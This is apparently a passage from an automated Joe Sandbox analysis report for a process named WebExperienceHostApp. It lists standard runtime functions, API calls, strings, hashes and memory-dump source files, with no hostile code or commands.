                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrowfputwcfwritestd::ios_base::failure::failure
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 1428583292-1866435925
                                                                    • Opcode ID: a7380e94e6d0c0f3b865c1dec62774918b944c1c4d491e2328d2bb9d19e9cd10
                                                                    • Instruction ID: 06e59358cfb385b9a20c74650b7c4161d6c634b7ca751e6ef5a835b3e404ca04
                                                                    • Opcode Fuzzy Hash: a7380e94e6d0c0f3b865c1dec62774918b944c1c4d491e2328d2bb9d19e9cd10
                                                                    • Instruction Fuzzy Hash: 0B61AC36619A8399EB10DF25E4806AD3BA0FB84B88F844433EB4D4776ADF3DE556C310
                                                                    APIs
                                                                      • Part of subcall function 00007FFE13306430: RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE13306474
                                                                      • Part of subcall function 00007FFE13306430: RaiseException.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFE133064BA
                                                                    • RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE13305FE7
                                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00007FFE13306043
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                    • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                    • API String ID: 1852475696-928371585
                                                                    • Opcode ID: 6b9ef99d590b32f0c659d059e5f7edc288c3d0282fa246750663d343d086c454
                                                                    • Instruction ID: 54bbdbc7d020e06affd823d24c05ea76cd61eb282a9f3cb253a18c052671807c
                                                                    • Opcode Fuzzy Hash: 6b9ef99d590b32f0c659d059e5f7edc288c3d0282fa246750663d343d086c454
                                                                    • Instruction Fuzzy Hash: F951B262A1DE46CAEE20CB12E4516BD6360FF64BA4F504171DAAD237B9DF3CE545C308
                                                                    APIs
                                                                    • std::ios_base::failure::failure.LIBCPMT ref: 00007FFE002C9E13
                                                                    • _CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE002BCB58), ref: 00007FFE002C9E24
                                                                    • std::ios_base::failure::failure.LIBCPMT ref: 00007FFE002C9E67
                                                                    • _CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE002BCB58), ref: 00007FFE002C9E78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 2003779279-1866435925
                                                                    • Opcode ID: 36d0e9059c3f7a5d91012be966453ad462b8d1acf47367d5311b1a054c73d7d8
                                                                    • Instruction ID: cfe3c3ccb2958c21048d90c82e23e0e1215bd3438acf0301baf046dbda42f0c2
                                                                    • Opcode Fuzzy Hash: 36d0e9059c3f7a5d91012be966453ad462b8d1acf47367d5311b1a054c73d7d8
                                                                    • Instruction Fuzzy Hash: 0B619222A08A4785EB54DB15D4947B96BA0FBC0F88F948036DB4E477BADF7CD986C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memchrtolower$_errnoisspace
                                                                    • String ID: 0123456789abcdefghijklmnopqrstuvwxyz
                                                                    • API String ID: 3508154992-4256519037
                                                                    • Opcode ID: c43dd37b695d77a9b309dd68fdeaa8cc30da9b2a4874080a3472f04000c7b43e
                                                                    • Instruction ID: d364120d8848cb28143a691f0c621579d1e587fd140807e9a41f2a1172406ae2
                                                                    • Opcode Fuzzy Hash: c43dd37b695d77a9b309dd68fdeaa8cc30da9b2a4874080a3472f04000c7b43e
                                                                    • Instruction Fuzzy Hash: C151F912A0CB9746E7218E25A5103797EE4AFC4B94F494031CFDE423AEDE3CE942D712
                                                                    APIs
                                                                    • __std_exception_copy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,00007FF60BD7505F,?,?,00000000,00007FF60BD732B7), ref: 00007FF60BD7526A
                                                                    • _CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,00007FF60BD7505F,?,?,00000000,00007FF60BD732B7), ref: 00007FF60BD75286
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF60BD7505F,?,?,00000000,00007FF60BD732B7), ref: 00007FF60BD7528C
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF60BD7505F,?,?,00000000,00007FF60BD732B7), ref: 00007FF60BD75299
                                                                    • _CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,00007FF60BD7505F,?,?,00000000,00007FF60BD732B7), ref: 00007FF60BD752D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionHeapThrow$AllocProcess__std_exception_copy
                                                                    • String ID: bad allocation$length
                                                                    • API String ID: 1592919366-1253776366
                                                                    • Opcode ID: ad62b17777bdb2592f32d953bdb081b6088459a80fef08f55ac007a4efa72339
                                                                    • Instruction ID: e46d19ce3414b4cccce6d02bb1d38eabfe1710d4eac8e952e09dce19b2508e42
                                                                    • Opcode Fuzzy Hash: ad62b17777bdb2592f32d953bdb081b6088459a80fef08f55ac007a4efa72339
                                                                    • Instruction Fuzzy Hash: FA315A21E54B4289FB04CB64E8401ED77A0EB58748B648336DA4EA77B5FFB8E186C740
                                                                    APIs
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB00
                                                                      • Part of subcall function 00007FFE002BBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB08
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB11
                                                                      • Part of subcall function 00007FFE002BBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB2D
                                                                    • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FFE002B2EAE), ref: 00007FFE002B1D2F
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FFE002B2EAE), ref: 00007FFE002B1D4F
                                                                    • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FFE002B2EAE), ref: 00007FFE002B1D72
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FFE002B2EAE), ref: 00007FFE002B1D92
                                                                      • Part of subcall function 00007FFE00284D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D32
                                                                      • Part of subcall function 00007FFE00284D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D58
                                                                      • Part of subcall function 00007FFE00284D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D70
                                                                    Strings
                                                                    • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFE002B1D59
                                                                    • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFE002B1D9C
                                                                    • :AM:am:PM:pm, xrefs: 00007FFE002B1DBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
                                                                    • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                    • API String ID: 1539549574-35662545
                                                                    • Opcode ID: 098d413dcb5924b6020e165d67e324c57de685152ce5448261965bf7dc3e88b3
                                                                    • Instruction ID: ff3f53ef84b31966fda0607278b42c8b0f57e8dfdc71f05fd56d7e9cba134e6d
                                                                    • Opcode Fuzzy Hash: 098d413dcb5924b6020e165d67e324c57de685152ce5448261965bf7dc3e88b3
                                                                    • Instruction Fuzzy Hash: 88313E26A05B4686EB11DF21E8402A97BA5FBC9FC0F498536DB4D4376AEF3CE541C340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: abort$AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1501936508-0
                                                                    • Opcode ID: 74333b6a48d437a1e49e0d4a5d17a7efd967f5fe4f1c704e53a008d29b640736
                                                                    • Instruction ID: a2d4962dbb00529aada94900aef319c511454f1ecce5bed511524d4dcf258403
                                                                    • Opcode Fuzzy Hash: 74333b6a48d437a1e49e0d4a5d17a7efd967f5fe4f1c704e53a008d29b640736
                                                                    • Instruction Fuzzy Hash: 5651D621E09E4289FA65CB17908063DA394EF28FB1F0940B9DEADA62B5DF2CD4518308
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: abort$AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1501936508-0
                                                                    • Opcode ID: 989c255742605067f4820ea93a2b17caff81b7e2dba0dcbb6734dfe784c1ce87
                                                                    • Instruction ID: 6a3d110a6c4c0ddca4a4e99125f8c2222750b7f24d2eaca15f5cd9b5b70aed80
                                                                    • Opcode Fuzzy Hash: 989c255742605067f4820ea93a2b17caff81b7e2dba0dcbb6734dfe784c1ce87
                                                                    • Instruction Fuzzy Hash: 3D51C531A09E4689EA66DB13D44063C63A4AF74FB4F1540B5EE6DA67B6DE2CD4428308
                                                                    APIs
                                                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FF60BD7863A), ref: 00007FF60BD775E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSingleWait
                                                                    • String ID:
                                                                    • API String ID: 24740636-0
                                                                    • Opcode ID: c270f8cfd8f0d8f66238c3edc3ee7643a8d2669a33f0277de5b9c3fb38bf199e
                                                                    • Instruction ID: cbd14a2fefd01a3976514a37201a67c220ca2b082c776b85d2d38d539add274a
                                                                    • Opcode Fuzzy Hash: c270f8cfd8f0d8f66238c3edc3ee7643a8d2669a33f0277de5b9c3fb38bf199e
                                                                    • Instruction Fuzzy Hash: 1E414725A8C54242F7689B25D8142FEE251EF8C784F70CB31D95FC66F9EEBCD8458601
                                                                    APIs
                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFE133065F9,?,?,?,?,00007FFE1330F862,?,?,?,?,?), ref: 00007FFE133067AB
                                                                    • FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFE133065F9,?,?,?,?,00007FFE1330F862,?,?,?,?,?), ref: 00007FFE133067B9
                                                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFE133065F9,?,?,?,?,00007FFE1330F862,?,?,?,?,?), ref: 00007FFE13306838
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$Value
                                                                    • String ID:
                                                                    • API String ID: 1883355122-0
                                                                    • Opcode ID: 73257c1383fe11a646b3e382a487d65d8038cd0931d20de145042498fb19a519
                                                                    • Instruction ID: 303f399d7346a09cf1ea43b65b8059ac95316823886f818850670691147e7bbb
                                                                    • Opcode Fuzzy Hash: 73257c1383fe11a646b3e382a487d65d8038cd0931d20de145042498fb19a519
                                                                    • Instruction Fuzzy Hash: 68215120E0CE42CAFA508B27A84413863A1EF68BF1B1446B4DD7E227F9DF3CA445D608
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Xp_setn$Xp_addx$Stofltisspaceisxdigit
                                                                    • String ID:
                                                                    • API String ID: 578106097-0
                                                                    • Opcode ID: 7ef03c6b0ac55c9f3de200f3f581fb418e73a4acab4f040e0592480e320118bd
                                                                    • Instruction ID: 71987b6cb54660f6384f7047dc24225b2118a0d6d7d7f6c2633374dd70af07f9
                                                                    • Opcode Fuzzy Hash: 7ef03c6b0ac55c9f3de200f3f581fb418e73a4acab4f040e0592480e320118bd
                                                                    • Instruction Fuzzy Hash: 1C619122B18A4386E611AF61E4806EE6B64FBD5744F504532EF4E137AFDE3DD58A8B00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Xp_setn$Xp_addx$Stofltisspaceisxdigit
                                                                    • String ID:
                                                                    • API String ID: 578106097-0
                                                                    • Opcode ID: 3851c44bb3e18abf273238eade94902fa9b0e404bf02cb7abefa916df54b760b
                                                                    • Instruction ID: 478bb7e44a2d417b18c9e2cc5e421b49238b3bc29a7b9610da59b883a41249b9
                                                                    • Opcode Fuzzy Hash: 3851c44bb3e18abf273238eade94902fa9b0e404bf02cb7abefa916df54b760b
                                                                    • Instruction Fuzzy Hash: DF61B222F1894382EA11DE65E4405BEBB68FBD4744F504532EB4E137AFDE3CE54A8701
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+
                                                                    • String ID: {for
                                                                    • API String ID: 2943138195-864106941
                                                                    • Opcode ID: 4da1d55eb30090646db3391131cdf7cb9f61c82d1a62715605f5e77d0e00937e
                                                                    • Instruction ID: b7eb724427da87adae84eb317dded2f91f3734ba2d845046cd2e9e146f7a131b
                                                                    • Opcode Fuzzy Hash: 4da1d55eb30090646db3391131cdf7cb9f61c82d1a62715605f5e77d0e00937e
                                                                    • Instruction Fuzzy Hash: C9517E72A08E81ADE7018F26D5403EC77A1EB647A8F8081B5EA6C67BB5DF7CD554C308
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread$xtime_get
                                                                    • String ID:
                                                                    • API String ID: 1104475336-0
                                                                    • Opcode ID: d839657264835679f194a2d385972008e0cfee51125028d57ca34eedcb85d6ac
                                                                    • Instruction ID: 476541e6865908655270617449588c5ad1389017cc93e7ed782ff31fb1d29a0b
                                                                    • Opcode Fuzzy Hash: d839657264835679f194a2d385972008e0cfee51125028d57ca34eedcb85d6ac
                                                                    • Instruction Fuzzy Hash: 51513F32A08A4796EB60CF15E4842797BA0FB84B44F504432DB8E837BADF7CE985C700
                                                                    APIs
                                                                    • memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE002B1D6E), ref: 00007FFE0028B9B0
                                                                    • memset.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE002B1D6E), ref: 00007FFE0028B9C0
                                                                    • memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE002B1D6E), ref: 00007FFE0028B9D5
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE002B1D6E), ref: 00007FFE0028BA09
                                                                    • memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE002B1D6E), ref: 00007FFE0028BA13
                                                                    • memset.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE002B1D6E), ref: 00007FFE0028BA23
                                                                    • memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE002B1D6E), ref: 00007FFE0028BA33
                                                                      • Part of subcall function 00007FFE002D2B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE00285AA8), ref: 00007FFE002D2B36
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset$_invalid_parameter_noinfo_noreturnmalloc
                                                                    • String ID:
                                                                    • API String ID: 2538139528-0
                                                                    • Opcode ID: 7b415068a4c640b8c640764b52e96af6a407be4c779bc6c3d2290d0abf82017c
                                                                    • Instruction ID: 3df0b386a9f0d38ead08d6551ab7f450460a3d81c6fc819649077fb1a7672192
                                                                    • Opcode Fuzzy Hash: 7b415068a4c640b8c640764b52e96af6a407be4c779bc6c3d2290d0abf82017c
                                                                    • Instruction Fuzzy Hash: AA41D525B09A8291EE04DF96E4042AD6B51FB84BD0F584536EF5D0BBAFCF7CD5418300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrowsetvbufstd::ios_base::failure::failure
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 2924853686-1866435925
                                                                    • Opcode ID: 257351d2f7990be225dd041c9f546b2110cac130ca75bce730c79efb961a91b5
                                                                    • Instruction ID: caad61d6d157d65226f2261dd76430f3867493321a618b91f7e0640593ffcff0
                                                                    • Opcode Fuzzy Hash: 257351d2f7990be225dd041c9f546b2110cac130ca75bce730c79efb961a91b5
                                                                    • Instruction Fuzzy Hash: 2C418872A18B8696EB50CF64E4843A827E0FB94B88F444536CB4C477AADF3DE5A4C740
                                                                    APIs
                                                                    • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE002A466E
